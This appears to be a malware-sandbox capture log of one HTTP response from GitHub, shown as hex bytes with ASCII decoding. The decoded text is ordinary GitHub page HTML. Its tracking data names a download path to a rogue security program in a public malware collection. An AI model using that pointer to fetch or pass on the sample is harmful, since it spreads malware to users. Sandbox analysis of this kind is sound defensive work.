                                                                                                                                                            Data Ascii: e="visitor-payload" content="eyJyZWZlcnJlciI6bnVsbCwicmVxdWVzdF9pZCI6Ijg3MzI6Qzc1RjoyOUU4MzI5OjJBRDMxQTQ6NjMzNTkzNkUiLCJ2aXNpdG9yX2lkIjoiMTMxMTcyNDgzOTgyNjcyNDYiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJpYWQifQ==" data-turbo-transient="true" /><m
                                                                                                                                                            2022-09-29 12:45:34 UTC37990INData Raw: 20 20 20 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 69 74 48 75 62 20 69 73 20 77 68 65 72 65 20 70 65 6f 70 6c 65 20 62 75 69 6c 64 20 73 6f 66 74 77 61 72 65 2e 20 4d 6f 72 65 20 74 68 61 6e 20 38 33 20 6d 69 6c 6c 69 6f 6e 20 70 65 6f 70 6c 65 20 75 73 65 20 47 69 74 48 75 62 20 74 6f 20 64 69 73 63 6f 76 65 72 2c 20 66 6f 72 6b 2c 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 65 20 74 6f 20 6f 76 65 72 20 32 30 30 20 6d 69 6c 6c 69 6f 6e 20 70 72 6f 6a 65 63 74 73 2e 22 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 65 61 72 63 68 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 70 65 6e 73 65 61 72 63 68 64 65 73 63 72 69 70 74 69 6f 6e 2b 78 6d
                                                                                                                                                            Data Ascii: <meta name="description" content="GitHub is where people build software. More than 83 million people use GitHub to discover, fork, and contribute to over 200 million projects."> <link rel="search" type="application/opensearchdescription+xm
                                                                                                                                                            2022-09-29 12:45:34 UTC37991INData Raw: 61 67 65 3a 77 69 64 74 68 22 20 63 6f 6e 74 65 6e 74 3d 22 31 32 30 30 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 68 65 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 36 32 30 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6d 6f 64 75 6c 65 73 2f 6f 70 65 6e 5f 67 72 61 70 68 2f 67 69 74 68 75 62 2d 6f 63 74 6f 63 61 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6d 61 67 65 2f 70 6e
                                                                                                                                                            Data Ascii: age:width" content="1200"> <meta property="og:image:height" content="620"> <meta property="og:image" content="https://github.githubassets.com/images/modules/open_graph/github-octocat.png"> <meta property="og:image:type" content="image/pn
                                                                                                                                                            2022-09-29 12:45:34 UTC37992INData Raw: 66 65 61 74 75 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 43 54 49 4f 4e 53 5f 52 55 4e 5f 4e 41 4d 45 2c 49 4d 41 47 45 5f 4d 45 54 52 49 43 5f 54 52 41 43 4b 49 4e 47 2c 47 45 4f 4a 53 4f 4e 5f 41 5a 55 52 45 5f 4d 41 50 53 2c 53 54 52 49 43 54 5f 44 45 46 45 52 52 45 44 5f 44 49 46 46 5f 4c 49 4e 45 53 5f 43 48 45 43 4b 53 2c 53 54 52 49 43 54 5f 44 45 46 45 52 52 45 44 5f 44 49 46 46 5f 4c 49 4e 45 53 5f 43 48 45 43 4b 53 5f 52 45 50 4f 52 54 49 4e 47 22 3e 0a 0a 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 70 6a 61 78 2d 76 65 72 73 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 65 31 31 35 62 32 35 39 65 66 37 62 35 39 64 36 37 33 38 35 64 62 38 33 35 61 33 65 61 34 36 61 31 65 65 31 34 61 63 38 30 32 66 31 35 65 30 30 63 38 61
                                                                                                                                                            Data Ascii: features" content="ACTIONS_RUN_NAME,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS,STRICT_DEFERRED_DIFF_LINES_CHECKS,STRICT_DEFERRED_DIFF_LINES_CHECKS_REPORTING"> <meta http-equiv="x-pjax-version" content="e115b259ef7b59d67385db835a3ea46a1ee14ac802f15e00c8a
                                                                                                                                                            2022-09-29 12:45:34 UTC37994INData Raw: 74 65 2f 62 72 6f 77 73 65 72 2f 65 72 72 6f 72 73 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 62 72 6f 77 73 65 72 2d 6f 70 74 69 6d 69 7a 65 6c 79 2d 63 6c 69 65 6e 74 2d 65 72 72 6f 72 73 2d 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 5f 70 72 69 76 61 74 65 2f 62 72 6f 77 73 65 72 2f 6f 70 74 69 6d 69 7a 65 6c 79 5f 63 6c 69 65 6e 74 2f 65 72 72 6f 72 73 22 3e 0a 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 70 69 6e 6e 65 64 2d 6f 63 74 6f 63 61 74 2e 73 76 67 22 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 0a 20 20 3c 6c 69 6e
                                                                                                                                                            Data Ascii: te/browser/errors"> <meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <lin
                                                                                                                                                            2022-09-29 12:45:34 UTC37995INData Raw: 43 34 36 46 0d 0a 72 65 73 73 2d 70 6a 61 78 2d 6c 6f 61 64 65 72 20 50 72 6f 67 72 65 73 73 20 70 6f 73 69 74 69 6f 6e 2d 66 69 78 65 64 20 77 69 64 74 68 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 30 25 3b 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 50 72 6f 67 72 65 73 73 2d 69 74 65 6d 20 70 72 6f 67 72 65 73 73 2d 70 6a 61 78 2d 6c 6f 61 64 65 72 2d 62 61 72 20 6c 65 66 74 2d 30 20 74 6f 70 2d 30 20 63 6f 6c 6f 72 2d 62 67 2d 61 63 63 65 6e 74 2d 65 6d 70 68 61 73 69 73 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 0a 0a 20 20 20 20 20 20 20 20 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                                                            Data Ascii: C46Fress-pjax-loader Progress position-fixed width-full"> <span style="width: 0%;" data-view-component="true" class="Progress-item progress-pjax-loader-bar left-0 top-0 color-bg-accent-emphasis"></span></span> <
                                                                                                                                                            2022-09-29 12:45:34 UTC37996INData Raw: 67 65 2c 20 69 63 6f 6e 3a 6c 6f 67 6f 2d 77 6f 72 64 6d 61 72 6b 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 68 65 69 67 68 74 3d 22 33 32 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 33 32 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 6d 61 72 6b 2d 67 69 74 68 75 62 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 38 20 30 43 33 2e 35 38 20 30 20 30 20 33 2e 35 38 20 30 20 38 63 30 20 33 2e 35 34 20 32 2e 32 39 20 36 2e 35 33 20 35 2e 34 37
                                                                                                                                                            Data Ascii: ge, icon:logo-wordmark"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47
                                                                                                                                                            2022-09-29 12:45:34 UTC37998INData Raw: 71 75 6f 74 3b 53 49 47 4e 5f 55 50 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6f 72 69 67 69 6e 61 74 69 6e 67 5f 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 75 73 65 72 5f 69 64 26 71 75 6f 74 3b 3a 6e 75 6c 6c 7d 7d 22 20 64 61 74 61 2d 68 79 64 72 6f 2d 63 6c 69 63 6b 2d 68 6d 61 63 3d 22 66 66 39 63 32 34 39 37 33 38 33 36 32 30 63 33 36 66 61 37 62 64 38 38 65 31 39 63 39 33 32 36 37 33 66 34 35 62 65 37 34 62 33 34 64 34 62 30 35 62 64 65 36 64 31 34 64 36 33 31 32 63 32 63 22
                                                                                                                                                            Data Ascii: quot;SIGN_UP&quot;,&quot;originating_url&quot;:&quot;https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="ff9c2497383620c36fa7bd88e19c932673f45be74b34d4b05bde6d14d6312c2c"
                                                                                                                                                            2022-09-29 12:45:34 UTC37999INData Raw: 65 6d 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 66 6c 65 78 2d 77 72 61 70 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 64 2d 62 6c 6f 63 6b 20 64 2d 6c 67 2d 66 6c 65 78 20 66 6c 65 78 2d 6c 67 2d 6e 6f 77 72 61 70 20 66 6c 65 78 2d 6c 67 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 6a 73 2d 64 65 74 61 69 6c 73 2d 63 6f 6e 74 61 69 6e 65 72 20 6a 73 2d 68 65 61 64 65 72 2d 6d 65 6e 75 2d 69 74 65 6d 22 3e 0a 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 6c 69 6e 6b 20 62 6f 72 64 65 72 2d 30 20 77 69 64 74 68 2d 66 75 6c 6c 20 77 69 64 74 68 2d 6c 67 2d 61 75 74 6f 20 70 78 2d 30 20
                                                                                                                                                            Data Ascii: em position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0
                                                                                                                                                            2022-09-29 12:45:34 UTC38000INData Raw: 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 3b 72 65 66 5f 63 74 61 3a 41 63 74 69 6f 6e 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 66 65 61 74 75 72 65 73 2f 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 32 34 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 77 6f 72 6b 66 6c 6f 77 20 63 6f 6c 6f 72 2d 66 67
                                                                                                                                                            Data Ascii: MalwareDatabase/raw/master/rogues/Win7Recover.zip;ref_cta:Actions;&quot;}" href="/features/actions"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg
                                                                                                                                                            2022-09-29 12:45:34 UTC38002INData Raw: 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 70 61 63 6b 61 67 65 20 63 6f 6c 6f 72 2d 66 67 2d 73 75 62 74 6c 65 20 6d 72 2d 33 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 32 2e 38 37 36 2e 36 34 61 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 2d 31 2e 37 35 20 30 6c 2d 38 2e 32 35 20 34 2e 37 36 32 61 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 2d 2e 38 37 35 20 31 2e 35 31 35 76 39 2e 35 32 35 63 30 20 2e 36 32 35 2e 33 33 34 20 31 2e 32 30 33 2e 38 37 35 20 31 2e 35 31 35 6c 38 2e 32 35 20 34 2e 37 36 33 61 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 2e 37 35 20 30 6c 38 2e 32 35
                                                                                                                                                            Data Ascii: data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path fill-rule="evenodd" d="M12.876.64a1.75 1.75 0 00-1.75 0l-8.25 4.762a1.75 1.75 0 00-.875 1.515v9.525c0 .625.334 1.203.875 1.515l8.25 4.763a1.75 1.75 0 001.75 0l8.25
                                                                                                                                                            2022-09-29 12:45:34 UTC38003INData Raw: 31 20 31 33 2e 31 39 6c 2d 31 2e 39 37 2d 31 2e 39 37 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 31 2e 30 36 20 31 2e 30 36 6c 32 2e 35 20 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 31 2e 30 36 20 30 6c 35 2d 35 7a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 32 2e 35 34 2e 36 33 37 61 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 2d 31 2e 30 38 20 30 4c 33 2e 32 31 20 33 2e 33 31 32 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 32 20 34 2e 39 37 36 56 31 30 63 30 20 36 2e 31 39 20 33 2e 37 37 20 31 30 2e 37 30 35 20 39 2e 34 30 31 20 31 32 2e 38 33 2e 33 38 36 2e 31 34 35 2e 38 31 32 2e 31 34 35 20 31 2e 31 39 38 20 30 43 31 38 2e 32 32 39 20 32 30 2e 37 30 34 20 32 32 20 31 36 2e 31 39
                                                                                                                                                            Data Ascii: 1 13.19l-1.97-1.97a.75.75 0 00-1.06 1.06l2.5 2.5a.75.75 0 001.06 0l5-5z"></path><path fill-rule="evenodd" d="M12.54.637a1.75 1.75 0 00-1.08 0L3.21 3.312A1.75 1.75 0 002 4.976V10c0 6.19 3.77 10.705 9.401 12.83.386.145.812.145 1.198 0C18.229 20.704 22 16.19
                                                                                                                                                            2022-09-29 12:45:34 UTC38004INData Raw: 2e 37 35 76 37 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 31 31 38 2e 37 35 20 31 33 48 35 2e 32 35 61 31 2e 37 35 20 31 2e 37 35 20 30 20 30 31 2d 31 2e 37 35 2d 31 2e 37 35 76 2d 37 2e 35 7a 6d 31 2e 37 35 2d 2e 32 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2e 32 35 76 37 2e 35 63 30 20 2e 31 33 38 2e 31 31 32 2e 32 35 2e 32 35 2e 32 35 68 31 33 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 32 35 2d 2e 32 35 76 2d 37 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2d 2e 32 35 48 35 2e 32 35 7a 4d 31 2e 35 20 31 35 2e 37 35 63 30 2d 2e 39 36 36 2e 37 38 34 2d 31 2e 37 35 20 31 2e 37 35 2d 31 2e 37 35 68 31 37 2e 35 63 2e 39 36 36 20 30 20 31 2e 37 35 2e 37 38 34 20 31 2e 37 35 20 31 2e 37 35 76 34 61 31 2e 37 35 20 31 2e 37 35 20 30 20
                                                                                                                                                            Data Ascii: .75v7.5A1.75 1.75 0 0118.75 13H5.25a1.75 1.75 0 01-1.75-1.75v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25H5.25zM1.5 15.75c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0
                                                                                                                                                            2022-09-29 12:45:34 UTC38006INData Raw: 3d 22 4d 39 2e 37 35 20 31 34 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2e 37 35 76 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 35 20 30 76 2d 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2d 2e 37 35 7a 6d 34 2e 35 20 30 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2e 37 35 76 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 35 20 30 76 2d 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2d 2e 37 35 7a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 32 20 32 63 2d 32 2e 32 31 34 20 30 2d 34 2e 32 34 38 2e 36 35 37 2d 35 2e 37 34 37 20 31 2e 37 35 36 61 37 2e 34 33 20 37 2e 34 33 20 30 20 30 30 2d 2e 33 39 37 2e 33 31 32 63 2d 2e 35 38 34 2e 32 33 35 2d
                                                                                                                                                            Data Ascii: ="M9.75 14a.75.75 0 01.75.75v2.5a.75.75 0 01-1.5 0v-2.5a.75.75 0 01.75-.75zm4.5 0a.75.75 0 01.75.75v2.5a.75.75 0 01-1.5 0v-2.5a.75.75 0 01.75-.75z"></path><path fill-rule="evenodd" d="M12 2c-2.214 0-4.248.657-5.747 1.756a7.43 7.43 0 00-.397.312c-.584.235-
                                                                                                                                                            2022-09-29 12:45:34 UTC38007INData Raw: 30 31 34 20 31 38 2e 33 32 33 76 2d 36 2e 36 37 7a 6d 36 2e 33 30 39 2d 31 2e 30 39 32 61 32 2e 33 35 20 32 2e 33 35 20 30 20 30 31 2d 2e 33 38 2e 33 37 34 63 2d 2e 34 33 37 2e 33 34 31 2d 31 2e 30 35 34 2e 35 36 34 2d 31 2e 39 36 34 2e 35 36 34 2d 31 2e 35 37 33 20 30 2d 32 2e 32 39 32 2d 2e 33 33 37 2d 32 2e 36 35 37 2d 2e 37 35 2d 2e 31 39 32 2d 2e 32 31 38 2d 2e 33 33 31 2d 2e 35 30 36 2d 2e 34 32 33 2d 2e 38 39 2d 2e 30 39 31 2d 2e 33 38 35 2d 2e 31 33 35 2d 2e 38 36 37 2d 2e 31 33 35 2d 31 2e 34 37 32 20 30 2d 31 2e 31 34 2e 32 34 33 2d 31 2e 38 34 37 2e 37 30 35 2d 32 2e 33 32 2e 34 37 37 2d 2e 34 38 37 20 31 2e 33 31 39 2d 2e 38 36 31 20 32 2e 38 32 34 2d 31 2e 30 32 34 20 31 2e 34 38 37 2d 2e 31 36 20 32 2e 31 39 32 2e 31 33 38 20 32 2e 35 33 33
                                                                                                                                                            Data Ascii: 014 18.323v-6.67zm6.309-1.092a2.35 2.35 0 01-.38.374c-.437.341-1.054.564-1.964.564-1.573 0-2.292-.337-2.657-.75-.192-.218-.331-.506-.423-.89-.091-.385-.135-.867-.135-1.472 0-1.14.243-1.847.705-2.32.477-.487 1.319-.861 2.824-1.024 1.487-.16 2.192.138 2.533
                                                                                                                                                            2022-09-29 12:45:34 UTC38008INData Raw: 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 63 6f 64 65 2d 72 65 76 69 65 77 20 63 6f 6c 6f 72 2d 66 67 2d 73 75 62 74 6c 65 20 6d 72 2d 33 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 30 2e 33 20 36 2e 37 34 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 2e 30 34 20 31 2e 30 36 6c 2d 32 2e 39 30 38 20 32 2e 37 20 32 2e 39 30 38 20 32 2e 37 61 2e 37 35 2e 37 35 20 30 20 31 31 2d 31 2e 30 32 20 31 2e 31 6c 2d 33 2e 35 2d 33 2e 32 35 61 2e 37 35 2e 37 35 20 30 20 30 31 30 2d 31 2e 31 6c 33 2e 35 2d 33 2e 32 35 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 30 36 2e 30 34 7a 6d 33 2e 34 34 20 31 2e 30 36 61 2e 37 35 2e 37 35 20 30 20 31 31 31 2e 30 32 2d 31 2e 31 6c 33 2e 35 20 33 2e 32 35 61 2e 37 35 2e 37 35 20 30 20 30 31 30 20 31 2e 31 6c 2d 33
                                                                                                                                                            Data Ascii: s="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 01-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 11-1.02 1.1l-3.5-3.25a.75.75 0 010-1.1l3.5-3.25a.75.75 0 011.06.04zm3.44 1.06a.75.75 0 111.02-1.1l3.5 3.25a.75.75 0 010 1.1l-3
                                                                                                                                                            2022-09-29 12:45:34 UTC38010INData Raw: 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 69 73 73 75 65 2d 6f 70 65 6e 65 64 20 63 6f 6c 6f 72 2d 66 67 2d 73 75 62 74 6c 65 20 6d 72 2d 33 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 2e 35 20 31 32 61 39 2e 35 20 39 2e 35 20 30 20 31 31 31 39 20 30 20 39 2e 35 20 39 2e 35 20 30 20 30 31 2d 31 39 20 30 7a 4d 31 32 20 31 43 35 2e 39 32 35 20 31 20 31 20 35 2e 39 32 35 20 31 20 31 32 73 34 2e 39 32 35 20 31 31 20 31 31 20 31 31 20 31 31 2d 34 2e 39 32 35 20 31 31 2d 31 31 53 31 38 2e 30 37 35 20 31 20 31 32 20 31 7a 6d 30 20 31 33 61 32 20 32 20 30 20 31 30 30 2d 34 20 32 20 32 20 30 20
                                                                                                                                                            Data Ascii: ta-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path fill-rule="evenodd" d="M2.5 12a9.5 9.5 0 1119 0 9.5 9.5 0 01-19 0zM12 1C5.925 1 1 5.925 1 12s4.925 11 11 11 11-4.925 11-11S18.075 1 12 1zm0 13a2 2 0 100-4 2 2 0
                                                                                                                                                            2022-09-29 12:45:34 UTC38011INData Raw: 2d 32 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2d 2e 32 35 76 2d 39 2e 35 7a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 32 32 2e 35 20 38 2e 37 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2d 2e 32 35 68 2d 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 30 2d 31 2e 35 68 33 2e 35 63 2e 39 36 36 20 30 20 31 2e 37 35 2e 37 38 34 20 31 2e 37 35 20 31 2e 37 35 76 39 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 31 32 32 2e 32 35 20 32 30 48 32 31 76 31 2e 35 34 33 61 31 2e 34 35 37 20 31 2e 34 35 37 20 30 20 30 31 2d 32 2e 34 38 37 20 31 2e 30 33 4c 31 35 2e 39 33 39 20 32 30 48 31 30 2e 37 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 31 39 20 31 38 2e 32 35 76 2d 31 2e 34 36 35 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 35 20 30 76
                                                                                                                                                            Data Ascii: -2a.25.25 0 01-.25-.25v-9.5z"></path><path d="M22.5 8.75a.25.25 0 00-.25-.25h-3.5a.75.75 0 010-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0122.25 20H21v1.543a1.457 1.457 0 01-2.487 1.03L15.939 20H10.75A1.75 1.75 0 019 18.25v-1.465a.75.75 0 011.5 0v
                                                                                                                                                            2022-09-29 12:45:34 UTC38012INData Raw: 6b 20 74 6f 20 67 6f 20 74 6f 20 44 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 3b 72 65 66 5f 63 74 61 3a 44 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 73 2e 67 69 74 68 75 62 2e 63 6f 6d 22 3e 0a 20 20 20 20 20 20 44 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 0a 0a 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42
                                                                                                                                                            Data Ascii: k to go to Documentation&quot;,&quot;label&quot;:&quot;ref_page:/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip;ref_cta:Documentation;&quot;}" href="https://docs.github.com"> Documentation <svg aria-hidden="true" height="16" viewB
                                                                                                                                                            2022-09-29 12:45:34 UTC38014INData Raw: 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 6c 69 6e 6b 2d 65 78 74 65 72 6e 61 6c 20 48 65 61 64 65 72 4d 65 6e 75 2d 65 78 74 65 72 6e 61 6c 2d 69 63 6f 6e 20 63 6f 6c 6f 72 2d 66 67 2d 73 75 62 74 6c 65 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 30 2e 36 30 34 20 31 68 34 2e 31 34 36 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2e 32 35 76 34 2e 31 34 36 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 34 32 37 2e 31 37 37 4c 31 33 2e 30 33 20 34 2e 30 33 20 39 2e 32 38 20 37 2e 37 38 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 36 2d 31 2e 30 36 6c
                                                                                                                                                            Data Ascii: width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path fill-rule="evenodd" d="M10.604 1h4.146a.25.25 0 01.25.25v4.146a.25.25 0 01-.427.177L13.03 4.03 9.28 7.78a.75.75 0 01-1.06-1.06l
